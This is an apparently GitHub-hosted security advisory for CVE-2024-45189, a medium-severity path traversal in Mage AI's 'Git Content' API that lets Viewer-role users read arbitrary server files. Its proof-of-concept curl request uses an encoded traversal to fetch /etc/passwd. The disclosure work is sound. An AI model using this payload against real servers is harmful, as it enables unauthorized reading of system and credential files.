Skip to content

Latest commit

 

History

History
48 lines (30 loc) · 922 Bytes

mage-ai-git-content-request-remote-arbitrary-file-leak-jfsa-2024-001039604.md

File metadata and controls

48 lines (30 loc) · 922 Bytes
description title date_published last_updated xray_id vul_id cvss severity discovered_by type
CVE-2024-45189, MEDIUM, Mage AI git content request remote arbitrary file leak
Mage AI git content request remote arbitrary file leak
2024-08-23
2024-08-23
JFSA-2024-001039604
CVE-2024-45189
6.5
medium
Ori Hollander
vulnerability

Summary

Mage AI git content request remote arbitrary file leak

Component

mage-ai

Affected versions

(,)

Description

Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "Git Content" request

PoC

curl -X GET
'http://localhost:6789/api/git_file/..%2F..%2Fetc%2Fpasswd?api_key=<USER API KEY>' -H 'Authorization: Bearer
<USER TOKEN>'

Vulnerability Mitigations

No mitigations are supplied for this issue

References

No references are supplied for this issue